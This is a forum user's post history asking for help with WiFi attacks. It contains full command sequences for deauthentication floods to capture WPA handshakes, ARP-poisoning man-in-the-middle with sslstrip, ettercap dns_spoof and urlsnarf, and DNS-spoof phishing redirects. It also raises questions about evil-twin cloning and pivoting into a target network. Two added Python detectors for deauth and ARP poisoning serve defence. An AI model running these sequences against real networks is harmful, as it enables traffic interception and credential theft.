GarrettVD

Posts posted by GarrettVD

  1. I'm trying to capture a 4-way WPA handshake using the Aircrack-ng suite of tools.

    The first issue was that, despite being in very close proximity, I was unable to see any clients in the terminal or .csv logs while running airodump-ng targeting a specific bssid on channel 1 + sending a few mass (i.e. not targeted to a specific client MAC) deauths every 15 seconds. No clients in the .CSV logs, yet I was able to see lots of probe responses from clients on the network, and beacons etc. (See screenshot #1)

    So I then tried to target a specific device MAC address on the network. (Screenshot #2) The device appeared in the CSV log under Station MACs. But still, no WPA handshakes. Weird. So I checked the logs, and I can see that there is communication to the AP from the client, and vice-versa, but no handshakes. Hmmm.


    BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
    6C:19:8F:E5:G5:1E, 2015-10-10 00:37:36, 2015-10-10 00:40:09, 1, 54, WPA2, CCMP TKIP,PSK, -54, 1106, 96, 0. 0. 0. 0, 6, KingEagle,


    Using the


    #!/bin/bash
    airmon-ng stop wlan1mon; \
    ifconfig wlan1 down; \
    ifconfig wlan0 down; \
    macchanger -r wlan1; \
    ifconfig wlan1 up; \
    airmon-ng start wlan1 1; \
    airodump-ng -c 1 --bssid 6C:19:8F:E5:G5:1E --showack --write /usb/airdump-log wlan1mon </dev/null &>/dev/null & \
    while sleep 15; do aireplay-ng -0 5 -a 6C:19:8F:E5:G5:1E wlan1mon --ignore-negative-one; done


    I'm attaching a screenshot of the probe responses and deauthentication packets.

    Any help would be great!

    Thanks,

    Screenshot #1 - Mass Deauthentication


    Screenshot #2 - Targeting HonHai___

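Added example, not from the original post: a defender-side detector for the deauthentication bursts the script above produces (aireplay-ng -0 5 spoofs the AP's address and sends five broadcast deauth frames per run, every 15 s). The BSSID, client MAC and frame records are constructed sample data; a real feed would come from a monitor-mode capture.

```python
# Added example (not from the original post): alert when one BSSID emits
# several deauthentication frames inside a short sliding window.  All MAC
# addresses and frames below are constructed sample data.
from collections import defaultdict, deque
from dataclasses import dataclass

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class Frame:
    ts: float      # capture timestamp in seconds
    subtype: str   # "deauth", "beacon", "probe_resp", "data", ...
    src: str       # transmitter address (addr2)
    dst: str       # receiver address (addr1)
    bssid: str     # addr3


class DeauthDetector:
    """Alert when one BSSID sends >= threshold deauth frames within window seconds."""

    def __init__(self, window=20.0, threshold=4):
        self.window = window
        self.threshold = threshold
        self._recent = defaultdict(deque)   # bssid -> deque of (ts, dst)

    def feed(self, frame):
        """Return an alert string for this frame, or None if nothing is wrong."""
        if frame.subtype != "deauth":
            return None
        q = self._recent[frame.bssid]
        q.append((frame.ts, frame.dst))
        # Drop entries that fell out of the sliding window.
        while q and frame.ts - q[0][0] > self.window:
            q.popleft()
        if len(q) < self.threshold:
            return None
        broadcast = sum(1 for _, dst in q if dst == BROADCAST)
        return (f"{frame.bssid}: {len(q)} deauth frames in {self.window:.0f}s "
                f"({broadcast} broadcast, {len(q) - broadcast} targeted)")


def scan(frames, window=20.0, threshold=4):
    """Run the detector over an iterable of frames; return [(ts, alert), ...]."""
    det = DeauthDetector(window, threshold)
    alerts = []
    for f in frames:
        msg = det.feed(f)
        if msg:
            alerts.append((f.ts, msg))
    return alerts


# Constructed sample: an AP beaconing normally, then two bursts of five
# broadcast deauths 15 s apart (what the loop in the post generates), then a
# single deauth aimed at one client.
AP = "00:11:22:33:44:55"        # constructed, stands in for the real BSSID
CLIENT = "66:77:88:99:aa:bb"    # constructed client station
SAMPLE = (
    [Frame(t, "beacon", AP, BROADCAST, AP) for t in (0.0, 1.0, 2.0)]
    + [Frame(10.0 + i / 10, "deauth", AP, BROADCAST, AP) for i in range(5)]
    + [Frame(12.0, "beacon", AP, BROADCAST, AP)]
    + [Frame(25.0 + i / 10, "deauth", AP, BROADCAST, AP) for i in range(5)]
    + [Frame(30.0, "deauth", AP, CLIENT, AP)]
)


def scan_sample():
    return scan(SAMPLE)


if __name__ == "__main__":
    for ts, msg in scan_sample():
        print(f"t={ts:5.1f}  {msg}")
```

A legitimate AP rarely deauthenticates many stations at once, so the first alert fires at the fourth frame of the first burst; tune window and threshold to the environment.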

  2. I am attempting to perform a MitM-style attack from my machine (MacBook Pro running 64-Bit Kali), by means of ARP-poisoning the communication between my router and my targeted machine (a MacBook Air running OSX Mavericks) on my WLAN (WPA2-secured network). In addition, I would like to employ a dns_spoof.

    I am using a combination of the following:
    - SSLStrip
    - Ettercap (with the dns_spoof plugin enabled).
    - urlsnarf
    - Wireshark (for examining post-test PCAP results)

    The commands I perform are as follows:

    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    sslstrip -p -k -w /root/sslstrip.log
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    urlsnarf -i wlan0 | grep http > /root/session.txt
    
    # 192.168.2.1 = router, 192.168.2.130 = Macbook Air
    
    echo 1 > /proc/sys/net/ipv4/ip_forward; ettercap -T -q -i wlan0 -P dns_spoof -M arp:remote /192.168.2.1/ /192.168.2.130/
    ettercap -T -i wlan0 -w /root/session.pcap -P dns_spoof -L /root/session -M arp:remote /192.168.2.1/ /192.168.2.130/
    
    # This runs for a while,I then stop manually... and then clean up and examine results in Wireshark
    
    wireshark &
    killall sslstrip
    killall python
    killall urlsnarf
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    etterlog -p -i /root/session.eci

    I am able to intercept and decode http packets just fine. Unfortunately, I've had little success in capturing/redirecting an HTTPS connection to an HTTP one (which I presume SSLStrip should be doing for me). I've tested by targeting multiple machines running different operating systems. For example, when I attempt to access https://www.foo.com/, I'd expect to be redirected to http://www.foo.com/. Instead, what happens is I will receive an untrusted certificate error (Windows 7 + IE, sometimes OSX Mavericks + Safari), or a timeout (Mavericks + Safari, iPhone 4s + Safari). Furthermore, the dns_spoof doesn't load; it just resolves the domain as it should. (see my /etc/ettercap/etter.dns configuration below).

    I've un-commented the iptables redirect commands within /etc/etter/etter.conf, as well as set the ec_uid and ec_gid to 0 (from the default of 65534).

    . . .
    
    [privs]
    ec_uid = 0                # nobody is the default
    ec_gid = 0                # nobody is the default
    
    . . .
    
    # if you use iptables:
       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    
    . . .

    Alternatively, for a simple dnsspoof, I've tried a simple combination of arpspoof + dnsspoof. Doesn't work either. :(

    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i wlan0 -t 192.168.2.130 192.168.2.1
    dnsspoof -i wlan0 -f /root/hosts.txt
    

    I've Googled for a few days now, but after reading post-upon-post of the same ill-fated solutions, alternatives and workarounds, I'm kind of stumped, to say the least. Some configuration files can be seen below...

    Any help would be greatly appreciated.

    Thanks,

    ############################################################################
    # #
    # ettercap -- etter.dns -- host file for dns_spoof plugin #
    # #
    # Copyright © ALoR & NaGA #
    # #
    # This program is free software; you can redistribute it and/or modify #
    # it under the terms of the GNU General Public License as published by #
    # the Free Software Foundation; either version 2 of the License, or #
    # (at your option) any later version. #
    # #
    ############################################################################
    # #
    # Sample hosts file for dns_spoof plugin #
    # #
    # the format is (for A query): #
    # www.myhostname.com A 168.11.22.33 #
    # *.foo.com A 168.44.55.66 #
    # #
    # ... for a AAAA query (same hostname allowed): #
    # www.myhostname.com AAAA 2001:db8::1 #
    # *.foo.com AAAA 2001:db8::2 #
    # #
    # or to skip a protocol family (useful with dual-stack): #
    # www.hotmail.com AAAA :: #
    # www.yahoo.com A 0.0.0.0 #
    # #
    # or for PTR query: #
    # www.bar.com PTR 10.0.0.10 #
    # www.google.com PTR ::1 #
    # #
    # or for MX query (either IPv4 or IPv6): #
    # domain.com MX xxx.xxx.xxx.xxx #
    # domain2.com MX xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx #
    # domain3.com MX xxxx:xxxx::y #
    # #
    # or for WINS query: #
    # workgroup WINS 127.0.0.1 #
    # PC* WINS 127.0.0.1 #
    # #
    # or for SRV query (either IPv4 or IPv6): #
    # service._tcp|_udp.domain SRV 192.168.1.10:port #
    # service._tcp|_udp.domain SRV [2001:db8::3]:port #
    # #
    # NOTE: the wildcarded hosts can't be used to poison the PTR requests #
    # so if you want to reverse poison you have to specify a plain #
    # host. (look at the www.microsoft.com example) #
    # #
    ############################################################################

    ################################
    # microsoft sucks ;)
    # redirect it to www.linux.org
    #

    microsoft.com A 198.182.2.23
    *.microsoft.com A 198.182.2.23
    www.microsoft.com PTR 198.182.2.23

    foo.com A 198.168.2.23
    *.foo.com A 198.168.2.23
    www.foo.com PTR 198.168.2.23 # Wildcards in PTR are not allowed


    ##########################################
    # no one out there can have our domains...
    #

    www.alor.org A 127.0.0.1
    www.naga.org A 127.0.0.1
    www.naga.org AAAA 2001:db8::2

    ##########################################
    # dual stack enabled hosts does not make life easy
    # force them back to single stack

    www.ietf.org A 127.0.0.1
    www.ietf.org AAAA ::

    www.example.org A 0.0.0.0
    www.example.org AAAA ::1

    ###############################################
    # one day we will have our ettercap.org domain
    #

    www.ettercap.org A 127.0.0.1
    www.ettercap-project.org A 127.0.0.1
    ettercap.sourceforge.net A 216.136.171.201
    www.ettercap.org PTR ::1

    ###############################################
    # some MX examples
    #

    alor.org MX 127.0.0.1
    naga.org MX 127.0.0.1
    example.org MX 127.0.0.2
    microsoft.com MX 2001:db8::1ce:c01d:bee3

    ###############################################
    # This messes up NetBIOS clients using DNS
    # resolutions. I.e. Windows/Samba file sharing.
    #

    LAB-PC* WINS 127.0.0.1

    ###############################################
    # some service discovery examples

    xmpp-server._tcp.jabber.org SRV 192.168.1.10:5269
    ldap._udp.mynet.com SRV [2001:db8:c001:beef::1]:389


    # vim:ts=8:noexpandtab

    ############################################################################
    # #
    # ettercap -- etter.conf -- configuration file #
    # #
    # Copyright © ALoR & NaGA #
    # #
    # This program is free software; you can redistribute it and/or modify #
    # it under the terms of the GNU General Public License as published by #
    # the Free Software Foundation; either version 2 of the License, or #
    # (at your option) any later version. #
    # #
    # #
    ############################################################################

    [privs]
    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default

    [mitm]
    arp_storm_delay = 10 # seconds
    arp_poison_warm_up = 1 # seconds
    arp_poison_delay = 10 # seconds
    arp_poison_icmp = 1 # boolean
    arp_poison_reply = 1 # boolean
    arp_poison_request = 0 # boolean
    arp_poison_equal_mac = 1 # boolean
    dhcp_lease_time = 1800 # seconds
    port_steal_delay = 10 # seconds
    port_steal_send_delay = 2000 # microseconds

    [connections]
    connection_timeout = 300 # seconds
    connection_idle = 5 # seconds
    connection_buffer = 10000 # bytes
    connect_timeout = 5 # seconds

    [stats]
    sampling_rate = 50 # number of packets

    [misc]
    close_on_eof = 1 # boolean value
    store_profiles = 1 # 0 = disabled; 1 = all; 2 = local; 3 = remote
    aggressive_dissectors = 1 # boolean value
    skip_forwarded_pcks = 1 # boolean value
    checksum_check = 0 # boolean value
    submit_fingerprint = 0 # boolean valid (set if you want ettercap to submit unknown finger prints)
    checksum_warning = 0 # boolean value (valid only if checksum_check is 1)

    ############################################################################
    #
    # You can specify what DISSECTORS are to be enabled or not...
    #
    # e.g.: ftp = 21 enabled on port 21 (tcp is implicit)
    # ftp = 2345 enabled on non standard port
    # ftp = 21,453 enabled on port 21 and 453
    # ftp = 0 disabled
    #
    # NOTE: some dissectors have multiple default ports, if you specify a new
    # one, all the default ports will be overwritten
    #
    #

    #dissector default port

    [dissectors]
    ftp = 21 # tcp 21
    ssh = 22 # tcp 22
    telnet = 23 # tcp 23
    smtp = 25 # tcp 25
    dns = 53 # udp 53
    dhcp = 67 # udp 68
    http = 80 # tcp 80
    ospf = 89 # ip 89 (IPPROTO 0x59)
    pop3 = 110 # tcp 110
    #portmap = 111 # tcp / udp
    vrrp = 112 # ip 112 (IPPROTO 0x70)
    nntp = 119 # tcp 119
    smb = 139,445 # tcp 139 445
    imap = 143,220 # tcp 143 220
    snmp = 161 # udp 161
    bgp = 179 # tcp 179
    ldap = 389 # tcp 389
    https = 443 # tcp 443
    ssmtp = 465 # tcp 465
    rlogin = 512,513 # tcp 512 513
    rip = 520 # udp 520
    nntps = 563 # tcp 563
    ldaps = 636 # tcp 636
    telnets = 992 # tcp 992
    imaps = 993 # tcp 993
    ircs = 994 # tcp 993
    pop3s = 995 # tcp 995
    socks = 1080 # tcp 1080
    radius = 1645,1646 # udp 1645 1646
    msn = 1863 # tcp 1863
    cvs = 2401 # tcp 2401
    mysql = 3306 # tcp 3306
    icq = 5190 # tcp 5190
    ymsg = 5050 # tcp 5050
    mdns = 5353 # udp 5353
    vnc = 5900,5901,5902,5903 # tcp 5900 5901 5902 5903
    x11 = 6000,6001,6002,6003 # tcp 6000 6001 6002 6003
    irc = 6666,6667,6668,6669 # tcp 6666 6667 6668 6669
    gg = 8074 # tcp 8074
    proxy = 8080 # tcp 8080
    rcon = 27015,27960 # udp 27015 27960
    ppp = 34827 # special case ;) this is the Net Layer code
    TN3270 = 23,992 # tcp 23 992

    #
    # you can change the colors of the curses GUI.
    # here is a list of values:
    # 0 Black 4 Blue
    # 1 Red 5 Magenta
    # 2 Green 6 Cyan
    # 3 Yellow 7 White
    #
    [curses]
    color_bg = 0
    color_fg = 7
    color_join1 = 2
    color_join2 = 4
    color_border = 7
    color_title = 3
    color_focus = 6
    color_menu_bg = 4
    color_menu_fg = 6
    color_window_bg = 4
    color_window_fg = 7
    color_selection_bg = 6
    color_selection_fg = 6
    color_error_bg = 1
    color_error_fg = 3
    color_error_border = 3

    #
    # This section includes all the configurations that needs a string as a
    # parmeter such as the redirect command for SSL mitm attack.
    #
    [strings]

    # the default encoding to be used for the UTF-8 visualization
    utf8_encoding = "ISO-8859-1"

    # the command used by the remote_browser plugin
    remote_browser = "xdg-open http://%host%url"


    #####################################
    # redir_command_on/off
    #####################################
    # you must provide a valid script for your operating system in order to have
    # the SSL dissection available
    # note that the cleanup script is executed without enough privileges (because
    # they are dropped on startup). so you have to either: provide a setuid program
    # or set the ec_uid to 0, in order to be sure the cleanup script will be
    # executed properly
    # NOTE: this script is executed with an execve(), so you can't use pipes or
    # output redirection as if you were in a shell. We suggest you to make a script if
    # you need those commands.

    #---------------
    # Linux
    #---------------

    # if you use ipchains:
    #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
    #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    #---------------
    # Mac Os X
    #---------------

    # quick and dirty way:
    #redir_command_on = "ipfw add set %set fwd 127.0.0.1,%rport tcp from any to any %port in via %iface"
    #redir_command_off = "ipfw -q delete set %set"

    # a better solution is to use a script that keeps track of the rules interted
    # and then deletes them on exit:

    # redir_command_on:
    # ----- cut here -------
    # #!/bin/sh
    # if [ -a "/tmp/osx_ipfw_rules" ]; then
    # ipfw -q add `head -n 1 osx_ipfw_rules` fwd 127.0.0.1,$1 tcp from any to any $2 in via $3
    # else
    # ipfw add fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 | cut -d " " -f 1 >> /tmp/osx_ipfw_rules
    # fi
    # ----- cut here -------

    # redir_command_off:
    # ----- cut here -------
    # #!/bin/sh
    # if [ -a "/tmp/osx_ipfw_rules" ]; then
    # ipfw -q delete `head -n 1 /tmp/osx_ipfw_rules`
    # rm -f /tmp/osx_ipfw_rules
    # fi
    # ----- cut here -------


    #---------------
    # Open BSD
    #---------------

    # unfortunately the pfctl command does not accepts direct rules adding
    # you have to use a script wich executed the following command:

    # ----- cut here -------
    # #!/bin/sh
    # rdr pass on $1 inet proto tcp from any to any port $2 -> localhost port $3 | pfctl -a sslsniff -f -
    # ----- cut here -------

    # it's important to remember that you need "rdr-anchor sslsniff" in your
    # pf.conf in the TRANSLATION section.

    #redir_command_on = "the_script_described_above %iface %port %rport"
    #redir_command_off = "pfctl -a sslsniff -Fn"

    # also, if you create a group called "pfusers" and have EC_GID be that group,
    # you can do something like:
    # chgrp pfusers /dev/pf
    # chmod g+rw /dev/pf
    # such that all users in "pfusers" can run pfctl commands; thus allowing non-root
    # execution of redir commands.


    ##########
    # EOF #
    ##########
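Added example, not from the original post: a defender-side detector for the ARP cache poisoning that "ettercap -M arp:remote /192.168.2.1/ /192.168.2.130/" performs (with arp_poison_reply = 1 and arp_poison_delay = 10 in the posted etter.conf, ettercap keeps sending unsolicited ARP replies so that router and target each map the other's IP to the attacker's MAC). The MAC addresses and reply records are constructed sample data; a real feed would come from captured ARP replies (opcode 2).

```python
# Added example (not from the original post): flag two on-wire symptoms of
# ARP poisoning: an IP whose MAC changes from the value learned earlier, and
# one MAC that claims several IPs including the gateway.  All MACs and reply
# records below are constructed sample data.
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    ts: float
    sender_ip: str
    sender_mac: str
    target_ip: str
    target_mac: str


class ArpPoisonDetector:
    def __init__(self, gateway_ip, baseline=None):
        self.gateway_ip = gateway_ip
        self.ip_to_mac = dict(baseline or {})     # ip -> MAC first seen (or trusted)
        self.mac_to_ips = defaultdict(set)        # mac -> every IP it has claimed
        for ip, mac in self.ip_to_mac.items():
            self.mac_to_ips[mac].add(ip)

    def feed(self, r):
        """Return the alert strings raised by this reply (empty list if benign)."""
        alerts = []
        known = self.ip_to_mac.get(r.sender_ip)
        if known is None:
            self.ip_to_mac[r.sender_ip] = r.sender_mac   # learn on first sight
        elif known != r.sender_mac:
            tag = " (gateway)" if r.sender_ip == self.gateway_ip else ""
            alerts.append(f"{r.sender_ip}{tag} moved from {known} to {r.sender_mac}")
        self.mac_to_ips[r.sender_mac].add(r.sender_ip)
        claimed = self.mac_to_ips[r.sender_mac]
        if len(claimed) > 1 and self.gateway_ip in claimed:
            alerts.append(f"{r.sender_mac} claims {sorted(claimed)} including the gateway")
        return alerts


def scan(replies, gateway_ip, baseline=None):
    """Run the detector over ARP replies; return [(ts, alert), ...]."""
    det = ArpPoisonDetector(gateway_ip, baseline)
    out = []
    for r in replies:
        out.extend((r.ts, a) for a in det.feed(r))
    return out


ROUTER_MAC = "00:11:22:33:44:01"     # constructed
TARGET_MAC = "00:11:22:33:44:02"     # constructed
ATTACKER_MAC = "aa:bb:cc:dd:ee:ff"   # constructed

# Constructed sample: a legitimate exchange first, so the true mappings are
# learned, then the bidirectional poison in which one MAC claims both the
# router's and the target's IP (the arp:remote pattern from the post).
SAMPLE = [
    ArpReply(0.0, "192.168.2.1", ROUTER_MAC, "192.168.2.130", TARGET_MAC),
    ArpReply(0.1, "192.168.2.130", TARGET_MAC, "192.168.2.1", ROUTER_MAC),
    ArpReply(5.0, "192.168.2.1", ATTACKER_MAC, "192.168.2.130", TARGET_MAC),
    ArpReply(5.0, "192.168.2.130", ATTACKER_MAC, "192.168.2.1", ROUTER_MAC),
]


def scan_sample():
    return scan(SAMPLE, gateway_ip="192.168.2.1")


if __name__ == "__main__":
    for ts, msg in scan_sample():
        print(f"t={ts:4.1f}  {msg}")
```

Seeding baseline with the gateway's real MAC (from the router's label or a trusted first capture) makes the "moved" alert fire even if the poison is already under way when monitoring starts.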

  3. I was able to get the Sierra Wireless Aircard 330u to work on my Mark V; assuming the 320u is not far off. The driver is unfortunately not included by default in the factory Mark V firmware image. Luckily, the Makefile for the sierra_net module is included in the firmware source bundle and has already been adapted to use OpenWrt's Makefile syntax. It is located in the /package/sierra-directip/ directory of the Mark V source bundle. You gotta compile it though. Hope you've access to a Linux machine!

    Is your device modeswitching, or appearing at all when you issue an lsusb?

    If it is and you'd like to get more detail about its connection status / what band its locking onto, you can issue some AT commands to it via picocom (or some other means). Just add "src/gz attitude_adjustment http://downloads.openwrt.org/attitude_adjustment/12.09/ar71xx/generic/packages" to your /opkg/opkg.conf, and then run "opkg install picocom"...

    #install picocom
    opkg install picocom
    picocom -b 9600 -f n -p n -d 8 -r /dev/ttyUSB3 #swap 0 with whatever your command port is
    
    #run picocom, then issue a AT!GSTATUS?
    root@Pineapple:~# picocom -b 9600 -f n -p n -d 8 -r /dev/ttyUSB3
    picocom v1.7
    
    port is        : /dev/ttyUSB3
    flowcontrol    : none
    baudrate is    : 9600
    parity is      : none
    databits are   : 8
    escape is      : C-a
    local echo is  : no
    noinit is      : no
    noreset is     : yes
    nolock is      : no
    send_cmd is    : sz -vv
    receive_cmd is : rz -vv
    imap is        : 
    omap is        : 
    emap is        : crcrlf,delbs,
    
    
    FATAL: cannot lock /dev/ttyUSB3: File exists
    root@Pineapple:~# picocom -b 9600 -f n -p n -d 8 -r /dev/ttyUSB
    ttyUSB0  ttyUSB1  ttyUSB2  ttyUSB3  ttyUSB4  ttyUSB5
    root@Pineapple:~# ifdown wwan
    root@Pineapple:~# picocom -b 9600 -f n -p n -d 8 -r /dev/ttyUSB3
    picocom v1.7
    
    port is        : /dev/ttyUSB3
    flowcontrol    : none
    baudrate is    : 9600
    parity is      : none
    databits are   : 8
    escape is      : C-a
    local echo is  : no
    noinit is      : no
    noreset is     : yes
    nolock is      : no
    send_cmd is    : sz -vv
    receive_cmd is : rz -vv
    imap is        : 
    omap is        : 
    emap is        : crcrlf,delbs,
    
    Terminal ready
    AT!GSTATUS?
    !GSTATUS: 
    Current Time:  7019		Temperature: 29
    Bootup Time:   1		Mode:        ONLINE         
    System mode:   WCDMA      	PS state:    Attached     
    WCDMA band:    WCDMA 850  
    WCDMA channel: 1037
    GMM (PS) state:REGISTERED     	NORMAL SERVICE 
    MM (CS) state: IDLE           	NORMAL SERVICE 
    
    WCDMA L1 State:L1M_PCH_SLEEP  	RRC State:   DISCONNECTED   
    RX level C0:   -86		LAC:         DBEC (56300)
    RX level C1:   -106		Cell ID:     ---omitted--
    
    
    OK
    
    

    ... so this tells me that it's locking onto the WCDMA 850 channel... aka 3G.

    To get the thing to work, here is more or less what I did.

    Grab the source from... http://wiki.wifipineapple.com/uploads/source.tar.gz

    Follow the guide here to set up your environment for cross-compilation, set compilation target to linux-ar71xx_generic, etc...

    Before you build, do a double-check of the .config file in the base directory of the source-code bundle, to ensure that the line "# CONFIG_PACKAGE_kmod-usb-net-sierrawireless=is not set" has been replaced with "CONFIG_PACKAGE_kmod-usb-net-sierrawireless=y".

    Issue the "make" command in the base directory of the source-code bundle.

    After some time, the build should complete and file will be located at {source code root}/build_dir/linux-ar71xx_generic/linux-3.3.8/drivers/net/usb/sierra_net.ko

    Copy that file by whatever means is preferable, to /lib/modules/sierra_net.ko on your Pineapple. So using scp for example...

    scp {source code root}/build_dir/linux-ar71xx_generic/linux-3.3.8/drivers/net/usb/sierra_net.ko root@172.16.41.1:/lib/modules/sierra_net.ko
    

    On your Pineapple, add "sierra_net" on a new line in the /etc/modules.d/61-usb-serial-wwan, below "usb_wwan".

    Create a symlink to that file from /etc/modules-boot.d/61-usb-serial-wwan.

    ln -s /etc/modules.d/61-usb-serial-wwan /etc/modules-boot.d/61-usb-serial-wwan
    

    Add this to your /etc/config/network file on the Pineapple:

    config interface 'wwan'
        option proto '3g'
        # swap with the path to the command port of your card...
        option device '/dev/ttyUSB3'
        # swap with your APN
        option apn 'lteinternet.apn'
        option service 'umts'
    

    Note that I set the service to UMTS above... My card is locking to the

    Then just do ifup wwan... Should show up as something like "3g-wwan" in your ifconfig output.

  4. I'll preface this by saying yes, I have searched the forums in-depth for a working solution. The DNSSpoof functionality on my factory-flashed v1.4.1 firmware Mark V simply does not function.

    I've configured the Mark V to host an access point on wlan0, to which I've connected with my iPhone. My Mark V is connected to my machine running Kali Linux via an ethernet cable. The Mark V has internet access provided via the wwan0 Sierra Wireless LTE modem on the host machine (not the Pineapple, as there don't appear to be supporting drivers). The clients of my AP on wlan0 have complete internet access this way, and I am able to browse just fine through my iPhone.

    But the DNSSpoof configuration simply doesn't work out-of-the-box.

    I've searched the /etc/pineapple/spoofhost and there are no extraneous ^M characters, as suggested in other threads.

    I've executed the dnsspoof command directly as suggested by Darren. When attempting to browse to facebook.com, the output is as follows.

    root@Pineapple:/www# dnsspoof -i br-lan -f /etc/pineapple/spoofhost
    dnsspoof: listening on br-lan [udp dst port 53 and not src 172.16.42.1]
    172.16.42.144.57622 > 172.16.42.1.53: 1791+ A? star.c10r.facebook.com
    172.16.42.144.49996 > 172.16.42.1.53: 62932+ A? channel-proxy-07-ash2.facebook.com
    172.16.42.144.61799 > 172.16.42.1.53: 26997+ A? webdav.facebook.com

    ifconfig output from the Pineapple, configured with my AP on wlan0:

    br-lan Link encap:Ethernet HWaddr 00:13:37:A5:2F:4C
    inet addr:172.16.42.1 Bcast:172.16.42.255 Mask:255.255.255.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:21746 errors:0 dropped:8 overruns:0 frame:0
    TX packets:9669 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:6718537 (6.4 MiB) TX bytes:3575839 (3.4 MiB)

    eth0 Link encap:Ethernet HWaddr 00:13:37:A5:2F:4C
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:16654 errors:0 dropped:8 overruns:0 frame:0
    TX packets:15500 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:7020808 (6.6 MiB) TX bytes:4583345 (4.3 MiB)
    Interrupt:4

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    UP LOOPBACK RUNNING MTU:16436 Metric:1
    RX packets:1454 errors:0 dropped:0 overruns:0 frame:0
    TX packets:1454 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:106768 (104.2 KiB) TX bytes:106768 (104.2 KiB)

    wlan0 Link encap:Ethernet HWaddr 00:13:37:A5:2F:4C
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:7070 errors:0 dropped:0 overruns:0 frame:0
    TX packets:7064 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:1203614 (1.1 MiB) TX bytes:4837933 (4.6 MiB)

    My /etc/pineapple/spoofhost file:

    172.16.42.1 *.facebook.com

    172.16.42.1 facebook.com

    After much mucking-around, I've settled on this for the /www/redirect.php file contents:

    <?php
    // Referer may be absent; strpos() returns 0 for a match at offset 0,
    // so compare against false instead of relying on truthiness.
    $ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
    if (strpos($ref, "facebook") !== false) {
        header('Location: facebook.html');
        exit; // stop here so index.html is not also sent after the redirect
    }
    require('index.html');
    ?>

    iPhone Wi-Fi settings once connected are as follows:

    IP: 172.16.42.144

    Subnet Mask: 255.255.255.0

    Router: 172.16.42.1

    DNS: 172.16.42.1

    Search Domains: lan

    I just have no idea why this doesn't work.

  5. Scenario: I have a WPA2-secured wireless network of which I know the password. Is it possible (with the Pineapple or via some other method) to mimic the MAC address, security and password of the target AP while performing a deauthentication attack on said router, in order to have network devices on the target AP's network automatically connect to my "cloned" AP? I understand that this works for open wireless networks, just wondering if it will work (and if there is support for this) on secured wireless networks? In this sense, I could run ettercap etc. on my cloned AP device, where I would not be able to had I simply connected to the target AP as a client.

  6. Hoping someone can help me out with this. My ideal setup with the Pineapple MK5 would look like this:

    [ Target AP ] <----> [ Pineapple ] <-- connected via a VPN, SSH relay, etc... --> [ Remote machine running Kali + Metasploit ]

    Basically what I'd like to do is access the target AP (a WPA2-secured network of which I have the psk) with the Pineapple on wlan1 in Client mode, and route the network connection back to my remote machine running Kali Linux + metasploit, be it through a reverse SSH connection, VPN connection, etc, in order to access network devices on the Target AP.

    I currently am able to reverse-SSH via a relay server I set up on Amazon EC2, but I am unsure of how to share the network connection of the target AP to my machine running Kali... Any ideas?

    What is the most practical way to connect to the Target AP and share that network?
